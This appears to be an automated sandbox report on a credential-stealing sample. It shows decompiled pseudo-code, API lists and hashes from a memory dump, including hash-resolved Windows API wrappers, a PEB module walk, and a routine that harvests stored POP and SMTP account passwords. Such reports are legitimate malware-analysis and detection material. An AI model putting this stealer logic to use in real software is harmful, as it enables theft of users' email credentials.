                                            • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                            • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00403C40(void* _a4) {
                                            				int _t4;
                                            				void* _t5;
                                            
                                            				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                                            				_t4 = FindCloseChangeNotification(_a4); // executed
                                            				return _t4;
                                            			}

                                            APIs
                                            • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ChangeCloseFindNotification
                                            • String ID:
                                            • API String ID: 2591292051-0
                                            • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                            • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                            • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                            • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00403C08(WCHAR* _a4) {
                                            				int _t4;
                                            				void* _t5;
                                            
                                            				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                                            				_t4 = DeleteFileW(_a4); // executed
                                            				return _t4;
                                            			}

                                            APIs
                                            • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0
                                            • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                            • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                            • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                            • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00402C1F(WCHAR* _a4) {
                                            				struct HINSTANCE__* _t4;
                                            				void* _t5;
                                            
                                            				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                                            				_t4 = LoadLibraryW(_a4); // executed
                                            				return _t4;
                                             			}

                                            APIs
                                            • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                            • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                            • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                            • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00403BEF(void* _a4) {
                                            				int _t4;
                                            				void* _t5;
                                            
                                            				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                                            				_t4 = FindClose(_a4); // executed
                                            				return _t4;
                                             			}

                                            APIs
                                            • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CloseFind
                                            • String ID:
                                            • API String ID: 1863332320-0
                                            • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                            • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                            • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                            • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00403BB7(WCHAR* _a4) {
                                            				long _t4;
                                            				void* _t5;
                                            
                                            				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                                            				_t4 = GetFileAttributesW(_a4); // executed
                                            				return _t4;
                                             			}

                                            APIs
                                            • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                            • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                            • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                            • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004049FF(void* _a4) {
                                            				long _t3;
                                            				void* _t4;
                                            
                                            				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                                            				_t3 = RegCloseKey(_a4); // executed
                                            				return _t3;
                                             			}

                                            APIs
                                            • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                            • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                            • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                            • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00403B64(WCHAR* _a4) {
                                            				int _t3;
                                            				void* _t4;
                                            
                                            				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                                            				_t3 = PathFileExistsW(_a4); // executed
                                            				return _t3;
                                             			}

                                            APIs
                                            • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExistsFilePath
                                            • String ID:
                                            • API String ID: 1174141254-0
                                            • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                            • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                            • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                            • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: closesocket
                                            • String ID:
                                            • API String ID: 2781271927-0
                                            • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                            • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                            • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                            • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00403FBF(intOrPtr _a4) {
                                            				void* _t2;
                                            				void* _t12;
                                            
                                            				_t2 = E00402B7C(0x208); // executed
                                            				_t12 = _t2;
                                            				if(_t12 == 0) {
                                            					L4:
                                            					return 0;
                                            				}
                                            				E00402B4E(_t12, 0, 0x208);
                                            				if(E00403B98(_a4, _t12, 0x104) == 0) {
                                            					GetLastError();
                                            					E00402BAB(_t12);
                                            					goto L4;
                                            				}
                                            				return _t12;
                                             			}

                                            APIs
                                              • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                              • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                            • GetLastError.KERNEL32(00000001,%s\Microsoft\Credentials,00000000,00000000,0040FA23), ref: 00403FF8
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateErrorLastProcess
                                            • String ID:
                                            • API String ID: 3278255179-0
                                            • Opcode ID: 5d355a1956dd76799a6e2a6fec7f3965d8d6b4db95ded28d5aea558ae739c6f3
                                            • Instruction ID: f7c486388e582fdd83a8ec6d56402c07db653bfffd511ff88b26ec3936c06817
                                            • Opcode Fuzzy Hash: 5d355a1956dd76799a6e2a6fec7f3965d8d6b4db95ded28d5aea558ae739c6f3
                                            • Instruction Fuzzy Hash: 70E09B6260151037D1217D565C0DE9F7E2C8F82BA9F04003BF604B51D1D97CA50141ED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00403F9E(void* _a4) {
                                            				int _t3;
                                            				void* _t4;
                                            
                                            				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                                            				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                                            				return _t3;
                                             			}

                                            APIs
                                            • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FreeVirtual
                                            • String ID:
                                            • API String ID: 1263568516-0
                                            • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                            • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                            • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                            • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00406472(long _a4) {
                                            				void* _t3;
                                            				void* _t4;
                                            
                                            				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                                            				Sleep(_a4); // executed
                                            				return _t3;
                                             			}

                                            APIs
                                            • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                            • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                            • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                            • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004058EA(char* _a4, char* _a8) {
                                            				char* _t4;
                                            				void* _t5;
                                            
                                            				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
                                            				_t4 = StrStrA(_a4, _a8); // executed
                                            				return _t4;
                                             			}

                                            APIs
                                            • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                            • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                            • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                            • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405924(WCHAR* _a4, WCHAR* _a8) {
                                            				WCHAR* _t4;
                                            				void* _t5;
                                            
                                            				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                                            				_t4 = StrStrW(_a4, _a8); // executed
                                            				return _t4;
                                             			}

                                            APIs
                                            • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                            • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                            • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                            • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 0040438F
                                            • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                            • VariantInit.OLEAUT32(?), ref: 004043C4
                                            • SysAllocString.OLEAUT32(?), ref: 004043CD
                                            • VariantInit.OLEAUT32(?), ref: 00404414
                                            • SysAllocString.OLEAUT32(?), ref: 00404419
                                            • VariantInit.OLEAUT32(?), ref: 00404431
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: InitVariant$AllocString$CreateInitializeInstance
                                            • String ID:
                                            • API String ID: 1312198159-0
                                            • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                            • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                            • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                            • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 88%
                                            			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				intOrPtr _v40;
                                            				intOrPtr _v44;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr _t40;
                                            				intOrPtr _t45;
                                            				intOrPtr _t47;
                                            				void* _t71;
                                            				void* _t75;
                                            				void* _t77;
                                            
                                            				_t72 = _a4;
                                            				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                                            				_t81 = _t71;
                                            				if(_t71 != 0) {
                                            					_push(__ebx);
                                            					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                                            					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                                            					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                                            					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                                            					_v8 = _v8 & 0x00000000;
                                            					_v20 = _t40;
                                            					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                                            					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                                            					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                                            					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                                            					_v12 = _v12 & 0x00000000;
                                            					_v32 = _t45;
                                            					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                                            					_t77 = _t75 + 0x50;
                                            					_v36 = _t47;
                                            					if(_v8 != 0 || _v12 != 0) {
                                            						E00405872( *0x49f934, _t71, 1, 0);
                                            						E00405872( *0x49f934, _t67, 1, 0);
                                            						_t74 = _v16;
                                            						E00405872( *0x49f934, _v16, 1, 0);
                                            						E00405781( *0x49f934, _v40);
                                            						E00405872( *0x49f934, _v20, 1, 0);
                                            						_push(_v8);
                                            						E00405762(_v16,  *0x49f934, _v24);
                                            						E00405872( *0x49f934, _v28, 1, 0);
                                            						E00405781( *0x49f934, _v44);
                                            						E00405872( *0x49f934, _v32, 1, 0);
                                            						_push(_v12);
                                            						E00405762(_t74,  *0x49f934, _v36);
                                            						_t77 = _t77 + 0x88;
                                            					} else {
                                            						_t74 = _v16;
                                            					}
                                            					E0040471C(_t71);
                                            					E0040471C(_t67);
                                            					E0040471C(_t74);
                                            					E0040471C(_v20);
                                            					E0040471C(_v24);
                                            					E0040471C(_v28);
                                            					E0040471C(_v32);
                                            					E0040471C(_v36);
                                            				}
                                            				return 1;
                                             			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                            • API String ID: 0-2111798378
                                            • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                            • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                            • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                            • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E0040317B(intOrPtr _a4) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				void* __ecx;
                                            				intOrPtr _t17;
                                            				void* _t21;
                                            				intOrPtr* _t23;
                                            				void* _t26;
                                            				void* _t28;
                                            				intOrPtr* _t31;
                                            				void* _t33;
                                            				signed int _t34;
                                            
                                            				_push(_t25);
                                            				_t1 =  &_v8;
                                            				 *_t1 = _v8 & 0x00000000;
                                            				_t34 =  *_t1;
                                            				_v8 =  *[fs:0x30];
                                            				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
                                            				_t31 = _t23;
                                            				do {
                                            					_v12 =  *((intOrPtr*)(_t31 + 0x18));
                                            					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
                                            					_pop(_t26);
                                            					_t35 = _t28;
                                            					if(_t28 == 0) {
                                            						goto L3;
                                            					} else {
                                            						E004032EA(_t35, _t28, 0);
                                            						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
                                            						_t33 = _t33 + 0x14;
                                            						if(_a4 == _t21) {
                                            							_t17 = _v12;
                                            						} else {
                                            							goto L3;
                                            						}
                                            					}
                                            					L5:
                                            					return _t17;
                                            					L3:
                                            					_t31 =  *_t31;
                                            				} while (_t23 != _t31);
                                            				_t17 = 0;
                                            				goto L5;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                            • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                            • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                            • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                            Uniqueness

                                            Uniqueness Score: -1.00%